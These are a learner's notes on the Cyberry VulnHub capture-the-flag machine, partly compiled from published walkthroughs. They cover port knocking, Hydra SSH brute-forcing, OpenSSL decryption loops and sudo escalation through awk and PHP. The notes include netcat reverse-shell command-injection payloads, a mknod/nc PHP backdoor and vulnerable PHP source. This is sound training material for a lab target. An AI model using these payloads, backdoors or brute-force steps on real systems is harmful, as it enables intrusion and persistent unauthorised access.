VM 1 Cyberry:

Walkthru:

A. https://prasannakumar.in/infosec/vulnhub-cyberry-1-writeup/ [Port knocking, comments in HTML,Brainfuck code, Hydra for SSH, execute commands remotely using SSH, install ftp, openssl decrypt loop passing thru all supported ciphers, file command, command injection vulnerability and adding nc to a web request, head command, sudo access, shifting user from another using sudo , escaping restricted shell using awk , run shell using PHP -r, creating php page/script using echo, creating custom password dictionary based on hints]

B. http://www.secremoval.com/cyberry-walkthrough.html
[burp suite to get root access to the Admin panel, detail abt how to identify command injection vulnerability, installing backdoor, uer enumeration, Unalias]

C. https://vulniverse.blogspot.com/2018/01/cyberry-1-walkthrough-well-so-much-for.html [base64 decode, QR code, buffer overflow but not complete ]

D. https://www.sans.org/reading-room/whitepapers/sysadmin/port-knocking-basics-1634 [What is port Knocking]

E. https://copy.sh/brainfuck/ [A Brainfuck editor & optimizing interpreter, written in JavaScript]

F. https://stackoverflow.com/questions/16056135/how-to-use-openssl-to-encrypt-decrypt-files [How to encrypt and decrypt using Openssl]

G. https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/ [Restricted Linux Shell Escaping Techniques]

H.Breaking Out of a Limited Shell in Linux [https://github.com/joenorton8014/offense/wiki/Breaking-Out-of-a-Limited-Shell-in-Linux]

I. https://hackso.me/cyberry-1-walkthrough/ [Port knocking to create all port combination]

See Inventory Sheet:

Notes:

1.       Ran nmap. Port 666 was showing closed after sometime, probably because machine was running low on resource. Should have rebooted it after once it was observed

2.       Nikto, dirb showed few directories but nothing that pointer 

3.    Full Nmap shows TCP ports 21,22,80 & 666

--    Found name "Chuck" in the comments in one of the page. Tried to brute force using SSH and FTP using hydra but no luck.
  - I took a look at the web server on port 80. It serves up a basic homepage with a clock set to quarter-to-one and no useful-looking links or login buttons to play with. Although the page doesn't give much away, view-source contained some base64 encoded comments which look like they could be our first clue: [see walkthru C]

I copied this into a text file and decided to run dirbuster against the site to see what else may be hiding there. While this was running, I took the opportunity to decode the mysterious base64 messages:

Okay, so we have an html file and an image to check out. Dirbuster had also turned up several more  files and things were starting to look promising.

- -  Also tried to use SQL bypass injection at the PHPMYADMIN site but no luck.

- -  Was able to create a login on the other page but it didnt have anything useful (ip/login.php)

-- Enumerating port 666 with Netcat

root@kali:~# nc 192.168.1.104 666
Interesting fact:
The tiny hairs on raspberries and blackberries are called
"styles" and are leftover from the berry blossom and serve
to protect the berry from damage.
Have a a great day!

  - Moving on to port 80.
Browsing http://192.168.1.104

-- From http://192.168.1.104/login.php, I saw a link to main site http://192.168.1.104/berrypedia.html..you have to pay close attention. This placefolder filename is different than other filename

- Browsing http://192.168.1.104/placeho1der.jpg. When I rotate the file, it says PORT OF TOCOMA

- The picture says “Port of Tacoma”. On further research, I got to know that four persons are singers who sang the same song ‘I hear you knocking’ in different years.

From top left, clockwise, name and release year of the song; Smiley Lewis – 1955, Dave Edmunds – 1970, Fats Domino – 1961, Gale Storm – 1955. Based on the port and song name, I concluded that this is a clue related to port knocking. [NOT SURE HOW WE GOT FROM WORD PORT OF TACOMMA TO THE SONG]

After a lot of strenuous efforts and trial and error, I pinged the creators of VM @cyberrsec for a hint. Based on the hint and further enumeration I got the sequence as anti-clockwise based on the ‘main’ placeho1der.jpg starting from Dave Edmunds. The sequence of ports for port knocking is 1970 1955 1955 1961

-Port knocking using Nmap

• for port in 1970 1955 1955 1961; do nmap -p $port 192.168.1.104 --host-timeout 201 --max-retries 0; done

After executing the above command line shell script in a terminal, I initiated full port scan using Nmap. Now port 61955/TCP shows up. It shows Apache httpd.  I tried to manually scanned these 4 ports one by open and in a open nmap command but the 69155/tcp port didnt show up ????.

Use the following script to perform port knocking on all different combinations:

To that end, I wrote a port-knocking script using nmap [source walkthru I]

1
2
3
4
5
6
7
8
9
10
11
12
13

# cat knock.sh
#!/bin/bash

TARGET=$1

for ports in $(cat permutation.txt); do
    echo "[*] Trying sequence $ports..."
    for p in $(echo $ports | tr ',' ' '); do
        nmap -n -v0 -Pn --max-retries 0 -p $p $TARGET
    done
    sleep 3
    nmap -n -v -Pn -p- -A --reason $TARGET -oN ${ports}.txt
done

permutation.txt contains all the permutations of 1955, 1955, 1961 and 1970 and I use Python to generate it.

# python -c 'import itertools; print list(itertools.permutations([1955,1955,1961,1970]))' | sed 's/), /\n/g' | tr -cd '0-9,\n' | sort | uniq
1955,1955,1961,1970
1955,1955,1970,1961
1955,1961,1955,1970
1955,1961,1970,1955
1955,1970,1955,1961
1955,1970,1961,1955
1961,1955,1955,1970
1961,1955,1970,1955
1961,1970,1955,1955
1970,1955,1955,1961
1970,1955,1961,1955
1970,1961,1955,1955 

When the script reaches the sequence 1970,1955,1955,1961, the port 61955/tcp appears.

A new port 61955 was found hosting a web service.

Browsing http://192.168.1.104:61955

While enumerating this website, similar to the one hosted on port 80, I found a link http://192.168.1.104:61955/H

Browsing http://192.168.1.104:61955/H

The page shows Brainf**k code. I used Execute BrainF**k and executed line by line (Paste a line at the website and you would get the result) and stored in a file ‘brainy.txt’ to get the following results.

root@kali:~# cat brainy.txt 
Hello World!
team members
chuck
halle
nick
terry
mary
kerry
pw:bakeoff

Seems like a password and username list. Creating a username list ‘user.lst’ based on the brainy.txt.

root@kali:~# cat user.lst 
chuck
halle
nick
terry
mary
kerry

Using Hydra to find the right combination of the credentials.

root@kali:~# hydra -L user.lst -p bakeoff ssh://192.168.1.104
......
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
[DATA] attacking ssh://192.168.1.104:22/
[22][ssh] host: 192.168.1.104   login: mary   password: bakeoff
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-18 07:24:07

Trying username ‘mary’ and password ‘bakeoff’ for SSH access

root@kali:~# ssh mary@192.168.1.104
mary@192.168.1.104's password: bakeoff

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 18 01:57:39 2018 from 192.168.1.101
Connection to 192.168.1.104 closed.

The connection is lost immediately, I tried appending commands to the SSH access eg: “ssh mary@192.168.1.104 id” didn’t work. So, I concluded that there is no shell defined for the user “mary”. Trying the same credentials in FTP service gave access.
-install ftp using #apt-get install ftp

root@kali:~# ftp 192.168.1.104
Connected to 192.168.1.104.
220 ProFTPD 1.3.5b Server (Debian) [192.168.1.104]
Name (192.168.1.104:root): mary
331 Password required for mary
Password:bakeoff
230 User mary logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwt   3 mary     mary         4096 Jan 18 02:01 .
drwxrwxrwt   3 mary     mary         4096 Jan 18 02:01 ..
drwxr-xr-x   2 mary     mary         4096 Nov 29 22:39 .bash_history
-rwxrwxrwt   1 mary     mary          220 Nov 20 00:34 .bash_logout
-rwxrwxrwt   1 mary     mary         3515 Nov 20 00:34 .bashrc
-rwxrwxrwt   1 mary     mary          675 Nov 20 00:34 .profile
226 Transfer complete

.bash_history being a directory seemed suspicious. Browsing to  .bash_history directory

ftp> cd .bash_history
250 CWD command successful
ftp> ls -al
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 mary     mary         4096 Nov 29 22:39 .
drwxrwxrwt   3 mary     mary         4096 Jan 18 02:01 ..
-rw-r--r--   1 mary     mary           64 Nov 29 22:35 .reminder.enc
-rw-r--r--   1 mary     mary          122 Nov 29 22:39 .trash
226 Transfer complete
ftp> get .reminder.enc
local: .reminder.enc remote: .reminder.enc
200 PORT command successful
150 Opening BINARY mode data connection for .reminder.enc (64 bytes)
226 Transfer complete
64 bytes received in 0.00 secs (240.3846 kB/s)
ftp> get .trash
local: .trash remote: .trash
200 PORT command successful
150 Opening BINARY mode data connection for .trash (122 bytes)
226 Transfer complete
122 bytes received in 0.00 secs (191.2370 kB/s)

Downloaded two files .reminder.enc and .trash from .bash_history to attacker system. Investigating the files

root@kali:~# file .reminder.enc 
.reminder.enc: openssl enc'd data with salted password
root@kali:~# cat .trash 
Most common passwords 2017 (Top 10)

123456
123456789
qwerty
12345678
111111
1234567890
1234567
password
123123
987654321

Seems, like .reminder.enc is encrypted file using OpenSSL and .trashcontains a list of passwords. Need to decrypt the file. For easy access, .reminder.enc is renamed to reminder.enc and a password.lst is created using  .trash. 

root@kali:~# mkdir openssl_decrypt
root@kali:~# cp .reminder.enc openssl_decrypt/reminder.enc
root@kali:~# tail -n +3 .trash > openssl_decrypt/password.lst
root@kali:~# cd openssl_decrypt/
root@kali:~/openssl_decrypt# cat password.lst 
123456
123456789
qwerty
12345678
111111
1234567890
1234567
password
123123
987654321

To decrypt the file I had to iterate through all the possible ciphers that OpenSSL support and also iterate to try each password from ‘password.lst’. I have used following command line bash script to try the same...openssl decrypt loop passing thru all supported ciphers

• for i in `openssl enc -ciphers | tail -n +2`;do for j in `cat password.lst`; do openssl ${i:1} -d -salt -md md5 -in reminder.enc -out "decrypted$i$j" -k $j;done;done 2>/dev/null

openssl enc -ciphers gives the list of the ciphers that OpenSSL support.

It creates a big list of files in the folder openssl_decrypt after you execute that command line bash script in a terminal as shown below

Now, checking for ASCII files [file command is used determine file type. in this case it shows,  empty, data, non-ISO and ASCII type files]

root@kali:~/openssl_decrypt# file * | grep ASCII
decrypted-aes256987654321:                    Non-ISO extended-ASCII text, with no line terminators
decrypted-aes-256-cbc987654321:               Non-ISO extended-ASCII text, with no line terminators
decrypted-camellia128111111:                  Non-ISO extended-ASCII text, with CR line terminators, with escape sequences
decrypted-camellia-128-cbc111111:             Non-ISO extended-ASCII text, with CR line terminators, with escape sequences
decrypted-camellia-128-ctrpassword:           Non-ISO extended-ASCII text, with NEL line terminators, with overstriking
decrypted-camellia-192-ecb987654321:          ASCII text
decrypted-camellia-256-ecb987654321:          Non-ISO extended-ASCII text
decrypted-des-cfb1234567890:                  Non-ISO extended-ASCII text, with NEL line terminators, with overstriking
decrypted-des-cfb1qwerty:                     Non-ISO extended-ASCII text, with CR, LF line terminators, with escape sequences, with overstriking
decrypted-des-ecb1234567890:                  Non-ISO extended-ASCII text, with no line terminators, with escape sequences
decrypted-desx12345678:                       Non-ISO extended-ASCII text, with NEL line terminators
decrypted-desx-cbc12345678:                   Non-ISO extended-ASCII text, with NEL line terminators
decrypted-rc2-64-cbcpassword:                 Non-ISO extended-ASCII text, with NEL line terminators
decrypted-rc2-64password:                     Non-ISO extended-ASCII text, with NEL line terminators
password.lst:                                 ASCII text

Reading the decrypted file,

root@kali:~/openssl_decrypt# cat decrypted-camellia-192-ecb987654321 
In case I forget, my login is dangleberry69

A new password  ‘dangleberry69’ is found.

While enumerating, http://192.168.1.104:61955, I found another login page similar to the one hosted at port 80.  But this login page didnt allow any registrations. Also, a wrong username is reported while testing the login.

Testing username ‘mary’ and password ‘bakeoff’ shows

In this case, the password was wrong and since no error reported for the user, ‘mary’ is a registered user. Trying username ‘mary’ and password ‘dangleberry69’ retrieved from the decrypted file, we gain access.

Visiting sectionub3r-s3cur3 at http://192.168.1.104:61955/ub3r-s3cur3/index.php, I see the output of command nslookup based on the query.

It presented a classic scenario of command injection vulnerability which can be exploited in this case to gain a low privileged shell. [command injection vulnerability and adding nc to a web request] [How do we know this is a command injection vulnerability. See Walkthru B]

Setup a Netcat listener on the attacker system at port 443

root@kali:~# nc -nlvp 443
listening on [any] 443 ...

Using “Inspect Element”, edit the options in drop down box as follows to append a command to call a reverse shell to the attacker system. Editing the option value as [google.com might already be present, you just have to use rest of nc cmd with the correct kali ip address and hit submit]

• google.com; nc 192.168.1.101 443 -e /bin/bash

Submitting the query, to gain the reverse shell with user ‘www-data’ privileges.

root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 38607
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Further enumeration revealed another password list (The head command is a command-line utility for outputting the first part of files given to it via standard input. It writes results to standard output. By defaulthead returns the first ten lines of each file that it is given)

www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$ ls -al     
ls -al
total 20
drwxr-xr-x 3 www-data www-data 4096 Nov 30 01:37 .
drwxr-xr-x 9 www-data www-data 4096 Dec  8 22:49 ..
-rw-r--r-- 1 www-data www-data  312 Nov 29 23:30 index.php
-rw-r--r-- 1 www-data www-data  644 Nov 25 11:45 nb-latin
drwxrwxrwx 2 www-data www-data 4096 Dec  8 14:57 teamdocs
www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$ head -n 10 nb-latin
head -n 10 nb-latin
porto
portavi
amo
amavi
paro
paravi
video
vidi
mitto
misi
www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$

copying the nb-latin to use as password.lst and already created user.lst , new set of credentials are found using Hydra

root@kali:~# hydra -L user.lst -P password.lst ssh://192.168.1.104
.....
[DATA] attacking ssh://192.168.1.104:22/
[22][ssh] host: 192.168.1.104   login: nick   password: custodio
[STATUS] 371.00 tries/min, 371 tries in 00:01h, 233 to do in 00:01h, 16 active

Gaining SSH access as  user nick with password custodio

root@kali:~# ssh nick@192.168.1.104
nick@192.168.1.104's password:custodio 
Last login: Wed Jan 17 21:39:14 2018 from 192.168.1.106
nick@cyberry:~$ id
uid=1003(nick) gid=1004(nick) groups=1004(nick)

Now enumerating for commands under sudo   shows

nick@cyberry:~$ sudo -l
Matching Defaults entries for nick on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nick may run the following commands on cyberry:
    (terry) SETENV: NOPASSWD: /home/nick/makeberry
    (terry) SETENV: NOPASSWD: /home/nick/invoke.sh

Checking invoke.sh as user terry

nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh
readlink: missing operand
Try 'readlink --help' for more information.
/home/nick/invoke.sh: 24: shift: can't shift that many
nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh -h
usage: invoke.sh -e KEY=VALUE prog [args...]
nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh /usr/bin/id
uid=1004(terry) gid=1005(terry) groups=1005(terry)

nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh /usr/bin/whoami
terry

Shifting from user nick to user terry




nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh /bin/bash -i
terry@cyberry:/home/nick$ id
uid=1004(terry) gid=1005(terry) groups=1005(terry)

Note: Refer Appendix 2 for another possibility

Checking again sudo permitted commands for user terry

terry@cyberry:/home/nick$ sudo -l
Matching Defaults entries for terry on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User terry may run the following commands on cyberry:
    (halle) SETENV: NOPASSWD: /usr/bin/awk

Shifting from user terry to user halle [The awk is an interpreted programming language designed for text processing. It is a standard feature of most unix-like operating systems, that’s why we can generally find them allowed in shells...see Walkthru/link G]

terry@cyberry:/home/nick$ sudo -u halle awk 'BEGIN {system("/bin/sh")}'
$ id
uid=1001(halle) gid=1001(halle) groups=1001(halle)

Checking again sudo permitted commands for user halle:

sudo -l
Matching Defaults entries for halle on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User halle may run the following commands on cyberry:
    (chuck) SETENV: NOPASSWD: /usr/bin/php

Shifting from user halle to user chuck [running PHP -r command. PHP is the interactive command/CLI  and with -r option, it allows us to run PHP code without using tags ]

$ sudo -u chuck php -r 'system("/bin/bash -i");'
chuck@cyberry:/home/nick$ 

But when I issue any command, in the new shell, an “Intrusion Detection System” turns on [see Walkthru B to disable it. Also pressed Ctrl+c to stop the countdown]

chuck@cyberry:/home/nick$ id
Cyberry Intrusion Detection activated
System Failsafe Mode :SFM: will begin in:

So coming back to halle shell, I create another input/script/page based PHP shell so that I can enumerate the system as chuck user

chuck@cyberry:/home/nick$ exit
$ echo \<\?php system\(\$argv\[1\]\)\; \?\> > /tmp/shell.php    
$ php /tmp/shell.php id
uid=1001(halle) gid=1001(halle) groups=1001(halle)
$ sudo -u chuck php /tmp/shell.php id
uid=1000(chuck) gid=1000(chuck) groups=1000(chuck),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Now while browsing the home directory, I came across

$ sudo -u chuck php /tmp/shell.php "ls -al /home/chuck"
total 40
drwxr-xr-x 3 chuck chuck 4096 Nov 30 23:21 .
drwxr-xr-x 9 root  root  4096 Nov 29 23:58 ..
-rw------- 1 chuck chuck 6175 Jan 18 03:56 .bash_history
-rw-r--r-- 1 chuck chuck  220 Nov 19 13:18 .bash_logout
-rw-r--r-- 1 root  root  9182 Nov 30 22:14 .bashrc
drwx------ 3 chuck chuck 4096 Nov 30 23:26 .deleted
-rw-r--r-- 1 chuck chuck  675 Nov 19 13:18 .profile
$ sudo -u chuck php /tmp/shell.php "ls -al /home/chuck/.deleted/"
total 16
drwx------ 3 chuck chuck 4096 Nov 30 23:26 .
drwxr-xr-x 3 chuck chuck 4096 Nov 30 23:21 ..
-rw------- 1 chuck chuck 1965 Dec  7 16:47 deleted
drwx------ 2 chuck chuck 4096 Nov 30 23:27 ssh_stuff

Reading the contents of deleted file under .deleted directory

$ sudo -u chuck php /tmp/shell.php "head -n 40 /home/chuck/.deleted/deleted"
From:  Berry, Chuck (chuckberry@cyberry)
Sent:   Wednesday, November 22, 2017 2:52pm
To:  Nick, Chuck (nickberry@cyberry)
Subject: Re: Christmas Meal
Thanks Nick, that might just help me out!
He did give me a few minor clues...
The password starts with "che" and ends with "rry"
letter e is used three times
letter c is used twice
letter r is used twice
letter b is used twice
letter a is used twice
The only other letters in the password were h,w,m & y
I think I'll probably have to write a little script to bruteforce SSH
with what I already know. If I get it done before close of business 
I'll get onto sorting out the Christmas meal. Promise!
Thanks again
-------------------------------------------------------------------
Ah ok buddy. I don't know if it helps you in any way
but I saw the password jotted down on a post-it note in his office
the other day! I can't recall it exactly but I do remember it being
a concatenated 4-word password....You know like "eatberriesandsmile"
It wasn't that, but it was something like that.... in fact I'm pretty
sure one of those four words was actually latin... Now that I'm thinking
about it I'm pretty sure it was "baca".... well 99% sure. 
I've been studying latin for a few months now, so it kinda 
stuck in the memory
Please don't tell anyone I told you this b.t.w! :-)

Themail talks about password security of root password. Based on the rules, I have followed this methodology to create a wordlist.

1)Since, the rules talks about 4 concatenated words, I have chosen words from American English wordlist present at /usr/share/dict/american-english.
2)The first word starts with ‘che’ , the end word or 4th word ends with ‘rry’ , 2nd or 3rd word can be ‘baca’ and finally 2nd or 3rd word can be an english word.
3)Based on the defined occurences, we can eliminate letter ‘a’ , as it already appears twice in ‘baca’.

First I extract words from American English Wordlist starting with che and store it in a file che.txt.
Now iterate the che.txt to remove words containing letters that are not defined in rules. Here, I also eliminated ‘r’ as it appears twice in ‘rry’. [-v allows inverse so I am creating a list that doesnt (reverse) include alphabets in char as the rule states, grep command below gives me a list of all the words starting with che but the 2nd command removes all the 2nd words starting with char ]

root@kali:~# mkdir pass
root@kali:~# cd pass
root@kali:~/pass# grep ^che /usr/share/dict/american-english > che.txt
root@kali:~/pass# for char in  a d f g i j k l n o p q r s t u v x z; do grep -v $char che.txt > temp.txt; mv temp.txt che.txt;done

Next, I extract words from American English Wordlist that end with rry and store it in a file rry.txt. Now iterate the rry.txt to remove words containing letters that are not defined in rules

root@kali:~/pass# grep rry$ /usr/share/dict/american-english > rry.txt
root@kali:~/pass# for char in  a d f g i j k l n o p q s t u v x z; do grep -v $char rry.txt > temp.txt; mv temp.txt rry.txt;done

At last, generate another set of wordlist as dict.txt to gather words that contain only letters defined in ruleset.

root@kali:~/pass# cp /usr/share/dict/american-english dict.txt
root@kali:~/pass# for char in  a d f g i j k l n o p q s t u v x z; do grep -v $char dict.txt > temp.txt; mv temp.txt dict.txt;done

Finally, I create a python script that iterates through three files and add ‘baca’ as 2nd or 3rd word to 4-word concatenated which is, in turn, checked for defined occurrences of letters. If true, that particular word is written to a file to generate a rule-based wordlist. To be noted, that some of the Uppercase words that aren’t based on ruleset are added in the wordlist. This script was done vaguely and one is always to welcome to do a better version of the script.

• def check_occurence(word):
• e_count = word.count('e')
• c_count = word.count('c')
• r_count = word.count('r')
• b_count = word.count('b')
• a_count = word.count('a')
• if e_count==3 and c_count==2 and r_count==2 and b_count==2 and a_count==2:
• return True
• else:
• return False
• first_words = open('che.txt','r').readlines()
• end_words = open('rry.txt','r').readlines()
• flag='baca'
• mid_words = open('dict.txt','r').readlines()
• for first_word in first_words:
• for mid_word in mid_words:
• for end_word in end_words:
• test_word1 = first_word[:-1]+flag+mid_word[:-1]+end_word[:-1]
• test_word2 = first_word[:-1]+mid_word[:-1]+flag+end_word[:-1]
• if check_occurence(test_word1)==True:
• final_list = open('final_list', 'a')
• final_list.write(test_word1+"\n")
• final_list.write(test_word2+"\n")
• final_list.close()

Executing it, a wordlist is created as final_list

root@kali:~/pass# python wordlist_gen.py 
root@kali:~/pass# ls
che.txt  dict.txt  final_list  rry.txt  wordlist_gen.py

Finding the correct credentials with Hydra to gain root access

root@kali:~/pass# hydra -l root -P final_list ssh://192.168.1.104
[22][ssh] host: 192.168.1.104   login: root   password: chewbacabemerry
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-18 10:31:08

Finally, gaining SSH access as root user with password chewbacabemerry

=====

Walkthru B




Arbitrary Code Injection

The ub3r-s3cur3 section was basically a web page with a dropdown where you could select between Google and Yahoo, and a button that seemed to run a DNS lookup command on the selected site. This looked an absolute cert for a code injection exploit:

When I got access to the box, later, I looked at the web page code (shown below). The code basically runs any linux command posted in the 'host' parameter (using the PHP system() method); as long as you complete the nslookup command first.

<?php
  $host = 'google';
  if (isset( $_POST['host'] ) )
    $host = $_POST['host'];
  system("nslookup " . $host);
?>

So we can replace $host with anything we like by manipulating the POST request using burp. This was my initial test:

POST /ub3r-s3cur3/index.php HTTP/1.1
Host: 192.168.1.182:61955
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.182:61955/ub3r-s3cur3/index.php
Cookie: PHPSESSID=l51cr2m3572ptqn6blv4eorkh0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

host=google.com; uname -a;

This test simply injected the uname -a Linux command into the request. Here was the result:

HTTP/1.1 200 OK
Date: Tue, 23 Jan 2018 19:34:40 GMT
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Length: 411
Connection: close
Content-Type: text/html; charset=UTF-8

Server: 192.168.1.254
Address: 192.168.1.254#53

Non-authoritative answer:
Name: google.com
Address: 216.58.204.14

Linux android-bbbc5ded6a7accf3 3.16.0-4-686-pae #1 SMP Debian 3.16.43-2+deb8u5 (2017-09-19) i686 GNU/Linux

I was in business! It was time to inject a reverse shell. I used the following post parameter: host=google.com;nc -e /bin/sh 192.168.1.71 4444;. I started a netcat listener and then sent the post request

Backdoor

Before I went looking for weaknesses to exploit I decided to install a backdoor that I could use to get shell access later. I didn't want to carry out all those previous steps everytime I wanted to get access. So I executed the following commands on the server (basically creating a new PHP web page called shell.php). The PHP script created a reverse shell to my Kali box on port 666:

$ cd /var/www/html
$ echo '<?php shell_exec(" mknod /tmp/backpipe p"); shell_exec(" /bin/sh 0</tmp/backpipe | nc 192.168.1.71 666 1>/tmp/backpipe "); ?>' > shell.php
$

User Enumeration

see the link for info but no success here

Unalias

I had noticed earlier in the engagement that the .bashrc had a bunch of aliascommands in it to simulate the 'intrusion detection' system. So this time when I had assumed the chuck account I was going to use the unalias -a command to temporary remove all of the aliases.

So off I went again... I connect as nick using SSH:

nick@cyberry:$ sudo -u terry /home/nick/invoke.sh /bin/bash -i
terry@cyberry:/home/nick$ sudo -u halle awk 'BEGIN {system("/bin/bash")}'
halle@cyberry:/home/nick$ sudo -u chuck php -r 'system("/bin/bash -i");' 
chuck@cyberry:/home/nick$ unalias -a

Now I was able to look around and see if there was anything chuck could do:

chuck@cyberry:$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for chuck:

Hmm, nothing without chuck's password! OK, so I had a look around to see what I could find as chuck.